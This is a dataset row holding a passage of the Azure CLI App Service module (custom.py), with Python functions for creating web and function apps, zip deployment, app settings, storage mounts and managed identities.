source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import ResourceNotFoundError, RequiredArgumentMissingError, ValidationError
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise ValidationError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
